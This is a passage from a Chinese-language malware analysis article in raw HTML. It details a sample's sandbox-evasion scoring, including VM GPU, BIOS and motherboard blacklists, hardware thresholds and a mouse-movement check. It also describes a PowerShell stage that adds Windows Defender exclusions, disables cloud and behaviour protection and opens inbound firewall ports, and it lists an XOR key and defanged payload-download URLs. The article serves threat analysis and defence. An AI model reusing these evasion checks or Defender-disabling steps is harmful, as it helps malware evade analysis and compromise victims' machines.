align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">检测项</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">评分值</span></p></th></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">GPU评分</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">1. 高可疑分，沙箱 GPU 黑名单：microsoft basic display adapter、vmware svga、virtualbox graphics、hyper-v video、qemu;</span></p><p><span leaf="">2. 真实用户特征减分，合法 GPU 白名单：geforce rtx 2/3/4、geforce gtx 10/16、radeon rx 5/6/7、quadro、radeon pro、rtx a、intel(r) uhd/iris/hd graphics、amd radeon(tm) graphics;</span></p><p><span leaf="">3. 无GPU信息，加分</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">CPU评分</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Xeon/EPYC→可疑；CPU核心数四级评分：&lt;2(最高风险)/=2/4-7/&gt;7(减分)</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">内存大小</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">&lt;3.5GB(极可疑)/3.5-4.5/≥8(减分)/≥16(更减分)</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">磁盘大小</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">系统盘&lt;40GB或&gt;200GB→加分；精确500GB/250GB→高疑似沙箱环境</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">软件数</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">四级评分：&lt;30(CRITICAL)/30-49/50-79/≥200(减分)</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">进程数</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">四级评分：&lt;60(极可疑)/60-99/100-299/≥300(减分)</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">分辨率</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">800x600/1024x768/1280x720→加分；1920x1080→减分</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">BIOS序列号黑名单</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ete9t8e8t3/H6MBDR4/0311-3550-2146-3025-5233-5781-38/0/1234567890（沙箱/模板化环境常见序列号）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">BIOS关键词</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">seabios/bochs/qemu/vrtual/hyper-v/vmware/google/vbox/innotek（虚拟化平台 BIOS 字符串）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">VM主板</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">VirtualBox/Google Compute Engine/Virtual Machine（关键命中级）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">开机时间检测</span></span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">&lt;5min→加分</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（3）即使通过上述全部检测，最后还有一个鼠标移动检测，才会触发后续恶意行为。下载的二阶段组件svc_service.exe同样存在该鼠标检测逻辑。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">样本如果检测到运行环境不符合要求，会弹出提示信息：”Sorry, your system does not meet the minimum requirements.”，然后结束运行。</span></p><p nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034982" data-ratio="1.1142857142857143" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-type="jpeg" data-w="455" src="https://wechat2rss.xlab.app/img-proxy/?k=4909c6e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqibdSXf9elHjNXDyETnrVBV9VDODiaXXmbRAOhN0qIYOlPfWkgY7cgcRhWEdsyrprRm9IuojkzicuIBpr3ibQuK6wEhG9MKGdlALIg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（二）安全防护关闭</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">如果环境检测通过，执行如下powershell代码。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1525" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034985" src="https://wechat2rss.xlab.app/img-proxy/?k=a0f3458b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq8IKVJdVkBhahaiaMia2YwkCCjkZkic6lHzrsIRob3vTRDPMiabSalUVSCNNicdia8vX0rXJDoWCQbibEn1KKMz8PDVURPIGAWpgYC8cs%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">异或解密后如下。</span></p><p nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034986" data-ratio="0.8451127819548873" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-type="jpeg" data-w="665" src="https://wechat2rss.xlab.app/img-proxy/?k=6b163235&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqibkicQibVE3rBicKuuDibqpX2PbZ39BktyYdkAKYOQR2QBJibo0ianwWKAx9P5JvLeJA1AxIibajkG1ZcXOWgEPzZZPM9neFDIYwefox4%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034988" data-ratio="0.37" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-type="jpeg" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=23f12985&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicmqzPd16CeHqdjsF7CsTjKeEsqtGTjR7ZqbINKD566usuJhI5NDCspUXolORHiarq40MCcCtxSibzw4SiaSay3PicNfyKNI3EwcuM%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">主要功能是关闭一些Windows Defender安全防护，包括</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">(1) 添加6个排除路径，C:\Users、$env:TEMP、C:\ProgramData、C:\OneDriveTemp、C:\Users\Public、C:\Windows</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">(2) 排除进程powershell.exe和pwsh.exe</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">(3) MAPS 报告关闭、云阻断关闭、样本提交NeverSend、云保护等级归零、PUA 保护 disable、IOAV 保护 disable、行为监控 disable</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">(4) 防火墙开放57001/57002/56001三个入站端口</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（三）字符串解密与后续载荷获取</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">函数sub_1400F22F5异或解密字符串，使用的key为” xnasff3wcedj”。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">样本获取后续载荷的链接通过字符串解密得到，两个链接一个是主地址，一个是备用地址。</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: normal;">hxxps://pastebin.com/raw/w6BVFFWQ</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: normal;">hxxps://snippet.host/beuskq/raw</span></span></p></th></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">两者各存放6个Azure云盘链接，指向7z压缩包，部分链接一致（不一致的用红色标识）。</span></p><table style="border-collapse:collapse;border:none;mso-border-alt:solid windowtext .5pt;mso-yfti-tbllook:1184;mso-padding-alt:0cm 5.4pt 0cm 5.4pt;"><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;"><td data-colwidth="553" width="553" valign="top" style="border: 1pt solid windowtext;padding: 0cm 5.4pt;"><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0311/0504vicloud.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:#C00000;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0507/0507autodate.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Up16OneSync.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Up17WinHealhCare.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0222/0224GHonedrive_sync.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:#C00000;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0311/svc_service.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p></td></tr><tr style="mso-yfti-irow:1;mso-yfti-lastrow:yes;"><td data-colwidth="553" width="553" valign="top" style="border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor windowtext windowtext;border-image: initial;padding: 0cm 5.4pt;"><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0311/0504vicloud.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:#C00000;"><span 